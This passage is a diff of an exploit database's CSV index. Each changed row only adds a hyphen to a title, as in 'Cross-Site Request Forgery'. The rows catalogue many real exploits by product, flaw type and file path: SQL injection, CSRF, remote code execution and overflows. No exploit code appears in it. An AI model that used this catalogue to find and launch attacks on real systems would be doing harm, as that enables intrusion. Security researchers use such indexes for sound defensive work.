Achor",hardware,remote,0 @@ -34722,7 +34722,7 @@ id,file,description,date,author,platform,type,port 38434,platforms/php/webapps/38434.txt,"PHP Address Book /addressbook/register/checklogin.php username Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38435,platforms/php/webapps/38435.txt,"PHP Address Book /addressbook/register/admin_index.php q Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38436,platforms/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 -38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 +38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 38438,platforms/php/webapps/38438.txt,"EasyPHP - 'index.php' Authentication Bypass and Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 @@ -34761,7 +34761,7 @@ id,file,description,date,author,platform,type,port 38478,platforms/php/webapps/38478.txt,"Sosci Survey Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store - 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps,0 38480,platforms/php/webapps/38480.txt,"Fork CMS - 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 -38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L Cross Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 +38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 38484,platforms/php/webapps/38484.rb,"WordPress Ajax Load More Plugin < 2.8.2 - File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 @@ -34772,10 +34772,10 @@ id,file,description,date,author,platform,type,port 38489,platforms/php/remote/38489.rb,"Nibbleblog File Upload",2015-10-19,Metasploit,php,remote,0 38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML injection and Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 -38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 +38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 38493,platforms/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,dos,0 38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 -38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 +38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF / Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0 38498,platforms/windows/dos/38498.py,"Elecard MPEG Player - '.m3u' File Buffer Overflow",2013-04-27,metacom,windows,dos,0 @@ -34785,7 +34785,7 @@ id,file,description,date,author,platform,type,port 38502,platforms/php/webapps/38502.txt,"GetSimple CMS /admin/edit.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0 38503,platforms/php/webapps/38503.txt,"GetSimple CMS /admin/filebrowser.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - SEH Over-Write Exploit",2015-10-21,Un_N0n,windows,local,0 -38505,platforms/php/remote/38505.rb,"Zpanel Remote Unauthenticated RCE",2015-10-21,Metasploit,php,remote,0 +38505,platforms/php/remote/38505.rb,"Zpanel - Remote Unauthenticated RCE",2015-10-21,Metasploit,php,remote,0 38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager /zapiServlet CIFS Configuration Management Interface Multiple Parameter XSS",2013-05-07,"M. Heinzl",php,webapps,0 38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager /zapiServlet User Management Interface Multiple Parameter XSS",2013-05-07,"M. Heinzl",php,webapps,0 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 @@ -34797,13 +34797,13 @@ id,file,description,date,author,platform,type,port 38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0 38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 38516,platforms/php/webapps/38516.txt,"Open Flash Chart - 'get-data' Parameter Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 -38517,platforms/php/webapps/38517.html,"WordPress Mail On Update Plugin Cross Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 +38517,platforms/php/webapps/38517.html,"WordPress Mail On Update Plugin Cross-Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 38518,platforms/php/webapps/38518.txt,"Jojo CMS - 'search' Parameter Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38519,platforms/php/webapps/38519.txt,"Jojo CMS - 'X-Forwarded-For' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps,0 -38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin Cross Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 +38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 38521,platforms/multiple/remote/38521.c,"Python RRDtool Module Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 38522,platforms/linux/remote/38522.txt,"Acme thttpd HTTP Server Directory Traversal",2013-05-19,Metropolis,linux,remote,0 -38523,platforms/php/webapps/38523.txt,"Weyal CMS Multiple SQL Injection",2013-05-23,XroGuE,php,webapps,0 +38523,platforms/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injection",2013-05-23,XroGuE,php,webapps,0 38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0 38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0 @@ -34856,9 +34856,9 @@ id,file,description,date,author,platform,type,port 38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - CSRF Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0 38580,platforms/windows/dos/38580.txt,"Windows NtCreateLowBoxToken Handle Capture Local DoS/Elevation of Privilege (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0 38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF",2015-10-30,"High-Tech Bridge SA",php,webapps,0 -38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras Cross Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 -38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0 -38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras Cross Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 +38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 +38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0 +38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery Plugin - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",php,webapps,0 38586,platforms/android/remote/38586.txt,"TaxiMonger for Android - 'name' Parameter HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass",2013-06-14,felipensp,multiple,remote,0 @@ -34890,11 +34890,11 @@ id,file,description,date,author,platform,type,port 38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0 38614,platforms/android/dos/38614.txt,"Samsung libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos,0 38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0 -38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use After Free",2015-11-03,"John Leitch",multiple,dos,0 +38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use-After-Free",2015-11-03,"John Leitch",multiple,dos,0 38617,platforms/windows/dos/38617.txt,"Python 2.7 strop.replace() Method - Integer Overflow",2015-11-03,"John Leitch",windows,dos,0 38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 product_setstate() Function - Out-of-bounds Read",2015-11-03,"John Leitch",windows,dos,0 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 -38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 +38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Security Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 38630,platforms/php/webapps/38630.html,"phpVibe Information Disclosure and Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 TrueType tt_cmap14_validate Parsing Heap-Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0 38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock Plugin - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 @@ -34926,7 +34926,7 @@ id,file,description,date,author,platform,type,port 38653,platforms/asp/webapps/38653.txt,"Corda Highwire - 'Highwire.ashx' File Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0 38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 -38656,platforms/php/webapps/38656.html,"PrestaShop Multiple Cross Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 +38656,platforms/php/webapps/38656.html,"PrestaShop Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS",2015-11-09,Nu11By73,hardware,webapps,0 39374,platforms/osx/dos/39374.c,"OS X Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 @@ -34945,7 +34945,7 @@ id,file,description,date,author,platform,type,port 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 38673,platforms/php/webapps/38673.txt,"Collabtive - Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0 38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 -38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 +38675,platforms/php/webapps/38675.html,"Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 38677,platforms/php/webapps/38677.txt,"VBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 @@ -34955,7 +34955,7 @@ id,file,description,date,author,platform,type,port 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0 -38824,platforms/hardware/remote/38824.html,"Fortinet FortiAnalyzer Cross Site Request Forgery",2013-10-12,"William Costa",hardware,remote,0 +38824,platforms/hardware/remote/38824.html,"Fortinet FortiAnalyzer Cross-Site Request Forgery",2013-10-12,"William Costa",hardware,remote,0 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"SilverStripe - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 @@ -35000,8 +35000,8 @@ id,file,description,date,author,platform,type,port 38729,platforms/php/webapps/38729.txt,"ClipperCMS 1.3.0 - Multiple SQL Injection",2015-11-16,"Curesec Research Team",php,webapps,80 38730,platforms/php/remote/38730.py,"ClipperCMS 1.3.0 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 38731,platforms/php/remote/38731.py,"XCart 5.2.6 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 -38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",2015-11-16,Metasploit,php,remote,9999 -38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",2015-11-16,Metasploit,php,remote,9999 +38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 - post2file.php Arbitrary File Upload",2015-11-16,Metasploit,php,remote,9999 +38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 - post2file.php Arbitrary File Upload",2015-11-16,Metasploit,php,remote,9999 38734,platforms/windows/dos/38734.txt,"Kaspersky Antivirus - Certificate Handling Path Traversal",2015-11-16,"Google Security Research",windows,dos,0 38735,platforms/windows/dos/38735.txt,"Kaspersky Antivirus - DEX File Format Memory Corruption",2015-11-16,"Google Security Research",windows,dos,0 38736,platforms/windows/dos/38736.txt,"Kaspersky Antivirus - ZIP File Format Use-After-Free",2015-11-16,"Google Security Research",windows,dos,0 @@ -35011,16 +35011,16 @@ id,file,description,date,author,platform,type,port 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",php,webapps,0 38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write",2013-08-06,"Piotr Duszynski",linux,remote,0 38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0 -38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0 +38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross-Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0 38745,platforms/php/webapps/38745.txt,"Xibo - 'layout' Parameter HTML Injection",2013-08-21,"Jacob Holcomb",php,webapps,0 -38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery",2013-08-21,"Jacob Holcomb",php,webapps,0 +38746,platforms/php/webapps/38746.html,"Xibo Cross-Site Request Forgery",2013-08-21,"Jacob Holcomb",php,webapps,0 38747,platforms/windows/dos/38747.py,"Pwstore Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos,0 38748,platforms/php/webapps/38748.txt,"dBlog CMS - 'm' Parameter SQL Injection",2013-09-03,ACC3SS,php,webapps,0 38749,platforms/asp/webapps/38749.txt,"Flo CMS - 'archivem' Parameter SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0 38752,platforms/windows/local/38752.c,"Watchguard Server Center Local Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0 -38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin Multiple Cross Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 +38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 38754,platforms/php/webapps/38754.txt,"eTransfer Lite - 'file name' Parameter HTML Injection",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0 38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 38756,platforms/php/webapps/38756.txt,"WordPress RokNewsPager Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0 @@ -35047,7 +35047,7 @@ id,file,description,date,author,platform,type,port 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0 -38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 +38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0 38784,platforms/php/webapps/38784.txt,"AlienVault Open Source SIEM (OSSIM) - 'timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 @@ -35061,7 +35061,7 @@ id,file,description,date,author,platform,type,port 38792,platforms/windows/local/38792.txt,"NVIDIA Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0 38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 38794,platforms/windows/dos/38794.txt,"Windows Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 -38795,platforms/windows/dos/38795.txt,"Windows Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 +38795,platforms/windows/dos/38795.txt,"Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38796,platforms/windows/dos/38796.txt,"Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38797,platforms/php/remote/38797.rb,"Joomla Content History - SQLi / Remote Code Execution",2015-11-23,Metasploit,php,remote,80 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 @@ -35075,7 +35075,7 @@ id,file,description,date,author,platform,type,port 38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 Tabular Reports Unspecified XSS",2013-10-09,"Mateusz Goik",cgi,webapps,0 38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale - 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 -38810,platforms/hardware/remote/38810.py,"Multiple Vendors 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 +38810,platforms/hardware/remote/38810.py,"Multiple Vendors - 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 38811,platforms/php/webapps/38811.txt,"WordPress Daily Deal Theme Arbitrary Shell Upload",2013-10-23,DevilScreaM,php,webapps,0 38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0 38813,platforms/multiple/remote/38813.txt,"Apache Shindig XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0 @@ -35105,14 +35105,14 @@ id,file,description,date,author,platform,type,port 38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Local Root",2015-12-01,rebel,multiple,local,0 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent XSS",2015-12-01,"Mehdi Alouache",php,webapps,0 -38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin Cross Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 +38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 38846,platforms/multiple/remote/38846.txt,"nginx 1.1.17 URI Processing Security Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0 38848,platforms/php/webapps/38848.php,"WordPress Suco Themes - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,Metasploit,cgi,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 -38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router Cross Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 +38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38852,platforms/php/webapps/38852.pl,"phpThumb - 'phpThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0 38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0 38854,platforms/linux/dos/38854.sh,"Net-SNMP SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",linux,dos,0 @@ -35159,7 +35159,7 @@ id,file,description,date,author,platform,type,port 38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,xml,webapps,0 38898,platforms/xml/webapps/38898.txt,"OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities",2015-12-08,LiquidWorm,xml,webapps,0 38899,platforms/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,xml,webapps,0 -38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 Remote Code Execution",2015-12-08,Metasploit,php,remote,80 +38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution",2015-12-08,Metasploit,php,remote,80 38901,platforms/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,php,webapps,80 38902,platforms/php/webapps/38902.txt,"WordPress Polls Widget Plugin 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 @@ -35178,12 +35178,12 @@ id,file,description,date,author,platform,type,port 38916,platforms/windows/dos/38916.html,"IE 11.0.9600.18097 COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 38917,platforms/osx/dos/38917.txt,"MacOS X 10.11 FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 -38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module Cross Site Request Forgery",2013-12-26,arno,php,webapps,0 +38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 38920,platforms/php/webapps/38920.txt,"AFCommerce /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38921,platforms/php/webapps/38921.txt,"AFCommerce /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38922,platforms/php/webapps/38922.txt,"AFCommerce /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows PhishingAlert Security Bypass Weakness",2013-12-07,Jackmasa,windows,remote,0 -38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross Site Request Forgery",2013-12-17,MustLive,php,webapps,0 +38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - CSRF",2015-12-10,KnocKout,php,webapps,80 38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 @@ -35200,7 +35200,7 @@ id,file,description,date,author,platform,type,port 38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0 